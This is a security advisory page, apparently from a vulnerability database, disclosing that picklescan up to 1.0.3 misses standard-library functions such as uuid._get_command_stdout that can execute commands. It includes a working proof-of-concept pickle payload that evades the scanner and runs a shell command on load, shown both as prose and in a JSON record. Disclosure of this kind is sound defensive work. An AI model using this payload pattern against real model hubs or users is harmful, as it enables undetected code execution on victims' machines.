GHSA-G38G-8GR9-H9XP

Vulnerability from github – Published: 2026-03-03 20:05 – Updated: 2026-03-03 20:05
VLAI
Summary
PickleScan has multiple stdlib modules with direct RCE not in blocklist
Details

Summary

picklescan v1.0.3 (latest) does not block at least 7 Python standard library modules that provide direct arbitrary command execution or code evaluation. A malicious pickle file importing these modules is reported as having 0 issues (CLEAN scan). This enables remote code execution that bypasses picklescan entirely.

Severity

Critical (CVSS 9.8) — Direct RCE with zero scanner detection. Affects all deployments relying on picklescan, including HuggingFace Hub.

Affected Versions

  • picklescan <= 1.0.3 (all versions including latest)

Details

Unblocked RCE Modules

Module Function RCE Mechanism picklescan Result
uuid _get_command_stdout(cmd, *args) subprocess.Popen((cmd,) + args) CLEAN
_osx_support _read_output(cmdstring) os.system() via temp file CLEAN
_osx_support _find_build_tool(toolname) Command injection via %s CLEAN
_aix_support _read_cmd_output(cmdstring) os.system() CLEAN
_pyrepl.pager pipe_pager(text, cmd) subprocess.Popen(cmd, shell=True) CLEAN
_pyrepl.pager tempfile_pager(text, cmd) os.system(cmd + ...) CLEAN
imaplib IMAP4_stream(command) subprocess.Popen(command, shell=True) CLEAN
test.support.script_helper assert_python_ok(*args) Spawns python subprocess CLEAN

All 8 functions are in Python's standard library and importable on all platforms.

Scanner Output

$ picklescan -p uuid_rce.pkl
No issues found.

$ picklescan -p aix_rce.pkl
No issues found.

$ picklescan -p imaplib_rce.pkl
No issues found.

Meanwhile:

$ python3 -c "import pickle; pickle.loads(open('uuid_rce.pkl','rb').read())"
uid=501(user) gid=20(staff) groups=20(staff),501(access),12(everyone)

Blocklist Analysis

picklescan v1.0.3's _unsafe_globals dict (scanner.py line 120-219) contains ~60 entries. None of the following modules appear:

  • uuid — not blocked
  • _osx_support — not blocked
  • _aix_support — not blocked
  • _pyrepl — not blocked
  • _pyrepl.pager — not blocked (parent wildcard doesn't apply since _pyrepl isn't blocked)
  • imaplib — not blocked
  • test — not blocked
  • test.support — not blocked
  • test.support.script_helper — not blocked

Proof of Concept

import struct, io, pickle

def sbu(s):
    b = s.encode()
    return b"\x8c" + struct.pack("<B", len(b)) + b

# uuid._get_command_stdout — arbitrary command execution
payload = (
    b"\x80\x04\x95" + struct.pack("<Q", 55)
    + sbu("uuid") + sbu("_get_command_stdout") + b"\x93"
    + sbu("bash") + sbu("-c") + sbu("id")
    + b"\x87" + b"R"   # TUPLE3 + REDUCE
    + b"."              # STOP
)

# Scan: 0 issues
from picklescan.scanner import scan_pickle_bytes
result = scan_pickle_bytes(io.BytesIO(payload), "test.pkl")
assert result.issues_count == 0  # CLEAN

# Execute: runs `id` command
pickle.loads(payload)

Tested Against

  • picklescan v1.0.3 (commit b999763, Feb 15 2026) — latest release
  • picklescan v0.0.21 — same result (modules never blocked in any version)

Impact

Any system using picklescan for pickle safety validation is vulnerable. This includes:

  • HuggingFace Hub — uses picklescan server-side to scan uploaded model files
  • ML pipelines — any CI/CD or loading pipeline using picklescan
  • Model registries — any registry relying on picklescan for safety checks

An attacker can upload a malicious model file to HuggingFace Hub that passes all picklescan checks and executes arbitrary code when loaded by a user.

Suggested Fix

Add to _unsafe_globals in picklescan:

"uuid": "*",
"_osx_support": "*",
"_aix_support": "*",
"_pyrepl": "*",
"imaplib": {"IMAP4_stream"},
"test": "*",

Architectural recommendation: The blocklist approach is fundamentally flawed — new RCE-capable stdlib functions can be discovered faster than they are blocked. Consider: 1. Switching to an allowlist (default-deny) for permitted globals 2. Treating ALL unknown globals as dangerous by default (currently marked "Suspicious" but not counted as issues)

Resources

  • picklescan source: scanner.py lines 120-219 (_unsafe_globals)
  • Python source: Lib/uuid.py, Lib/_osx_support.py, Lib/_aix_support.py, Lib/_pyrepl/pager.py, Lib/imaplib.py
Severity
9.8 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-693"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-03T20:05:26Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\npicklescan v1.0.3 (latest) does not block at least 7 Python standard library modules that provide direct arbitrary command execution or code evaluation. A malicious pickle file importing these modules is reported as having 0 issues (CLEAN scan). This enables remote code execution that bypasses picklescan entirely.\n\n## Severity\n\n**Critical** (CVSS 9.8) \u2014 Direct RCE with zero scanner detection. Affects all deployments relying on picklescan, including HuggingFace Hub.\n\n## Affected Versions\n\n- picklescan \u003c= 1.0.3 (all versions including latest)\n\n## Details\n\n### Unblocked RCE Modules\n\n| Module | Function | RCE Mechanism | picklescan Result |\n|--------|----------|--------------|-------------------|\n| `uuid` | `_get_command_stdout(cmd, *args)` | `subprocess.Popen((cmd,) + args)` | CLEAN |\n| `_osx_support` | `_read_output(cmdstring)` | `os.system()` via temp file | CLEAN |\n| `_osx_support` | `_find_build_tool(toolname)` | Command injection via `%s` | CLEAN |\n| `_aix_support` | `_read_cmd_output(cmdstring)` | `os.system()` | CLEAN |\n| `_pyrepl.pager` | `pipe_pager(text, cmd)` | `subprocess.Popen(cmd, shell=True)` | CLEAN |\n| `_pyrepl.pager` | `tempfile_pager(text, cmd)` | `os.system(cmd + ...)` | CLEAN |\n| `imaplib` | `IMAP4_stream(command)` | `subprocess.Popen(command, shell=True)` | CLEAN |\n| `test.support.script_helper` | `assert_python_ok(*args)` | Spawns `python` subprocess | CLEAN |\n\nAll 8 functions are in Python\u0027s standard library and importable on all platforms.\n\n### Scanner Output\n\n```\n$ picklescan -p uuid_rce.pkl\nNo issues found.\n\n$ picklescan -p aix_rce.pkl\nNo issues found.\n\n$ picklescan -p imaplib_rce.pkl\nNo issues found.\n```\n\nMeanwhile:\n```\n$ python3 -c \"import pickle; pickle.loads(open(\u0027uuid_rce.pkl\u0027,\u0027rb\u0027).read())\"\nuid=501(user) gid=20(staff) groups=20(staff),501(access),12(everyone)\n```\n\n### Blocklist Analysis\n\npicklescan v1.0.3\u0027s `_unsafe_globals` dict (scanner.py line 120-219) contains ~60 entries. None of the following modules appear:\n\n- `uuid` \u2014 not blocked\n- `_osx_support` \u2014 not blocked\n- `_aix_support` \u2014 not blocked\n- `_pyrepl` \u2014 not blocked\n- `_pyrepl.pager` \u2014 not blocked (parent wildcard doesn\u0027t apply since `_pyrepl` isn\u0027t blocked)\n- `imaplib` \u2014 not blocked\n- `test` \u2014 not blocked\n- `test.support` \u2014 not blocked\n- `test.support.script_helper` \u2014 not blocked\n\n### Proof of Concept\n\n```python\nimport struct, io, pickle\n\ndef sbu(s):\n    b = s.encode()\n    return b\"\\x8c\" + struct.pack(\"\u003cB\", len(b)) + b\n\n# uuid._get_command_stdout \u2014 arbitrary command execution\npayload = (\n    b\"\\x80\\x04\\x95\" + struct.pack(\"\u003cQ\", 55)\n    + sbu(\"uuid\") + sbu(\"_get_command_stdout\") + b\"\\x93\"\n    + sbu(\"bash\") + sbu(\"-c\") + sbu(\"id\")\n    + b\"\\x87\" + b\"R\"   # TUPLE3 + REDUCE\n    + b\".\"              # STOP\n)\n\n# Scan: 0 issues\nfrom picklescan.scanner import scan_pickle_bytes\nresult = scan_pickle_bytes(io.BytesIO(payload), \"test.pkl\")\nassert result.issues_count == 0  # CLEAN\n\n# Execute: runs `id` command\npickle.loads(payload)\n```\n\n### Tested Against\n\n- picklescan v1.0.3 (commit b999763, Feb 15 2026) \u2014 latest release\n- picklescan v0.0.21 \u2014 same result (modules never blocked in any version)\n\n## Impact\n\nAny system using picklescan for pickle safety validation is vulnerable. This includes:\n\n- **HuggingFace Hub** \u2014 uses picklescan server-side to scan uploaded model files\n- **ML pipelines** \u2014 any CI/CD or loading pipeline using picklescan\n- **Model registries** \u2014 any registry relying on picklescan for safety checks\n\nAn attacker can upload a malicious model file to HuggingFace Hub that passes all picklescan checks and executes arbitrary code when loaded by a user.\n\n## Suggested Fix\n\nAdd to `_unsafe_globals` in picklescan:\n```python\n\"uuid\": \"*\",\n\"_osx_support\": \"*\",\n\"_aix_support\": \"*\",\n\"_pyrepl\": \"*\",\n\"imaplib\": {\"IMAP4_stream\"},\n\"test\": \"*\",\n```\n\n**Architectural recommendation:** The blocklist approach is fundamentally flawed \u2014 new RCE-capable stdlib functions can be discovered faster than they are blocked. Consider:\n1. Switching to an allowlist (default-deny) for permitted globals\n2. Treating ALL unknown globals as dangerous by default (currently marked \"Suspicious\" but not counted as issues)\n\n## Resources\n\n- picklescan source: `scanner.py` lines 120-219 (`_unsafe_globals`)\n- Python source: `Lib/uuid.py`, `Lib/_osx_support.py`, `Lib/_aix_support.py`, `Lib/_pyrepl/pager.py`, `Lib/imaplib.py`",
  "id": "GHSA-g38g-8gr9-h9xp",
  "modified": "2026-03-03T20:05:26Z",
  "published": "2026-03-03T20:05:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-g38g-8gr9-h9xp"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mmaitre314/picklescan"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PickleScan has multiple stdlib modules with direct RCE not in blocklist"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.